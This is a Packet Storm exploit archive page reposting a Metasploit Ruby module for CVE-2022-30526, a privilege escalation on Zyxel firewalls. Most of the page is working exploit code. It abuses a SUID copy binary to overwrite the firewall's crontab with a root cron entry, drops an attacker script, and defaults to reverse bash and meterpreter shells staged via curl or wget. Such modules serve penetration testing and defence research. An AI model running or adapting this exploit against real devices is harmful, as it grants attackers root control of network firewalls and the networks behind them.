exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Zyxel Firewall SUID Binary Privilege Escalation

Zyxel Firewall SUID Binary Privilege Escalation
Posted Aug 31, 2022
Authored by jbaines-r7 | Site metasploit.com

This Metasploit module exploits CVE-2022-30526, a local privilege escalation vulnerability that allows a low privileged user (e.g. nobody) escalate to root. The issue stems from a suid binary that allows all users to copy files as root. This module overwrites the firewall's crontab to execute an attacker provided script, resulting in code execution as root. In order to use this module, the attacker must first establish shell access. For example, by exploiting CVE-2022-30525. Known affected Zyxel models include USG FLEX (50, 50W, 100W, 200, 500, 700), ATP (100, 200, 500, 700, 800), VPN (50, 100, 300, 1000), USG20-VPN and USG20W-VPN.

tags | exploit, shell, local, root, code execution
advisories | CVE-2022-30526
SHA-256 | ce0978f09bdc4f825505d8590e1f429b3ba8069c5e7e83d2268b514b437133c9

Zyxel Firewall SUID Binary Privilege Escalation

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking

prepend Msf::Exploit::Remote::AutoCheck
include Msf::Post::File
include Msf::Exploit::CmdStager
include Msf::Exploit::FileDropper

def initialize(info = {})
super(
update_info(
info,
'Name' => 'Zyxel Firewall SUID Binary Privilege Escalation',
'Description' => %q{
This module exploits CVE-2022-30526, a local privilege escalation vulnerability that
allows a low privileged user (e.g. nobody) escalate to root. The issue stems from
a suid binary that allows all users to copy files as root. This module overwrites
the firewall's crontab to execute an attacker provided script, resulting in code
execution as root.

In order to use this module, the attacker must first establish shell access. For
example, by exploiting CVE-2022-30525.

Known affected Zyxel models are: USG FLEX (50, 50W, 100W, 200, 500, 700),
ATP (100, 200, 500, 700, 800), VPN (50, 100, 300, 1000), USG20-VPN and USG20W-VPN.
},
'References' => [
['CVE', '2022-30526'],
['URL', 'https://www.zyxel.com/support/Zyxel-security-advisory-authenticated-directory-traversal-vulnerabilities-of-firewalls.shtml']
],
'Author' => [
'jbaines-r7' # discovery and metasploit module
],
'DisclosureDate' => '2022-06-14',
'License' => MSF_LICENSE,
'Platform' => ['linux', 'unix'],
'Arch' => [ARCH_CMD, ARCH_MIPS64],
'SessionTypes' => ['shell', 'meterpreter'],
'Targets' => [
[
'Unix Command',
{
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Type' => :unix_cmd,
'DefaultOptions' => {
'PAYLOAD' => 'cmd/unix/reverse_bash'
}
}
],
[
'Linux Dropper',
{
'Platform' => 'linux',
'Arch' => [ARCH_MIPS64],
'Type' => :linux_dropper,
'CmdStagerFlavor' => [ 'curl', 'wget' ],
'DefaultOptions' => {
'PAYLOAD' => 'linux/mips64/meterpreter_reverse_tcp'
}
}
]
],
'DefaultTarget' => 0,
'DefaultOptions' => {
'MeterpreterTryToFork' => true,
'WfsDelay' => 70
},
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [ARTIFACTS_ON_DISK]
}
)
)
end

# The check first establishes the system is a Zyxel firewall by parsing the
# /zyinit/fwversion file. Then it attempts to prove that zysudo.suid can be
# used by the user to write to otherwise unwrittable location.
def check
fwversion_data = read_file('/zyinit/fwversion')
if fwversion_data.nil? || fwversion_data.empty?
return CheckCode::Safe('Could not read /zyinit/fwversion. The target is not a Zyxel firewall.')
end

model_id = fwversion_data[/MODEL_ID=(?<model_id>[^\n]+)/, :model_id]
return CheckCode::Unknown('Failed to identify the firewall model.') if model_id.nil? || model_id.empty?

firmware_ver = fwversion_data[/FIRMWARE_VER=(?<firmware_ver>[^\n]+)/, :firmware_ver]
return CheckCode::Unknown('Failed to identify the firmware version.') if firmware_ver.nil? || firmware_ver.empty?

test_file = "/var/zyxel/#{rand_text_alphanumeric(12..16)}"
unless cmd_exec("/bin/cp /etc/passwd #{test_file}") == "/bin/cp: cannot create regular file '#{test_file}': Permission denied"
return CheckCode::Unknown("Failed to generate a permission issue. System version: #{model_id}, #{firmware_ver}")
end

suid_copy_result = cmd_exec("zysudo.suid /bin/cp /etc/passwd #{test_file}")
unless suid_copy_result.empty?
return CheckCode::Safe("zysudo.suid copy failed. System version: #{model_id}, #{firmware_ver}")
end

# clean up the created file
cmd_exec("zysudo.suid /bin/rm #{test_file}")

return CheckCode::Vulnerable("System version: #{model_id}, #{firmware_ver}")
end

# no matter what happens, try to reset the crontab to the original state and
# delete the backup file.
def cleanup
unless @crontab_backup.nil?
print_status('Resetting crontab to the original version')
cmd_exec("zysudo.suid /bin/cp #{@crontab_backup} /var/zyxel/crontab")
rm_rf(@crontab_backup)
end
end

def execute_command(cmd, _opts = {})
# this file will contain the payload and get executed by cron
exec_filename = "/tmp/#{rand_text_alphanumeric(6..12)}"
register_file_for_cleanup(exec_filename)
cmd_exec("echo -e \"#!/bin/bash\\n\\n#{cmd}\" > #{exec_filename}")
cmd_exec("chmod +x #{exec_filename}")

# this file will be a copy of the original crontab, plus our additional malicious entry
evil_crontab = "/tmp/#{rand_text_alphanumeric(6..12)}"
register_file_for_cleanup(evil_crontab)
copy_file('/var/zyxel/crontab', evil_crontab)
cmd_exec("echo '* * * * * root #{exec_filename} &' >> #{evil_crontab}")

# this is the backup copy of the original crontab. It'll be restored on new session
@crontab_backup = "/tmp/#{rand_text_alphanumeric(6..12)}"
copy_file('/var/zyxel/crontab', @crontab_backup)

# overwrite the legitimate crontab. this is how we get exectuion.
print_status('Overwriting /var/zyxel/crontab')
cmd_exec("zysudo.suid /bin/cp #{evil_crontab} /var/zyxel/crontab")

# check if the session has been created. Give it 70 seconds to come in.
# The extra 10 seconds is to account for high latency links.
print_status('The payload may take up to 60 seconds to be executed by cron')
sleep_count = 70
until session_created? || sleep_count == 0
sleep(1)
sleep_count -= 1
end
end

def exploit
print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
case target['Type']
when :unix_cmd
execute_command(payload.encoded)
when :linux_dropper
execute_cmdstager
end
end
end
Login or Register to add favorites

File Archive:

July 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    27 Files
  • 2
    Jul 2nd
    10 Files
  • 3
    Jul 3rd
    35 Files
  • 4
    Jul 4th
    27 Files
  • 5
    Jul 5th
    18 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    28 Files
  • 9
    Jul 9th
    44 Files
  • 10
    Jul 10th
    24 Files
  • 11
    Jul 11th
    25 Files
  • 12
    Jul 12th
    11 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    28 Files
  • 16
    Jul 16th
    6 Files
  • 17
    Jul 17th
    34 Files
  • 18
    Jul 18th
    6 Files
  • 19
    Jul 19th
    34 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    19 Files
  • 23
    Jul 23rd
    17 Files
  • 24
    Jul 24th
    47 Files
  • 25
    Jul 25th
    31 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close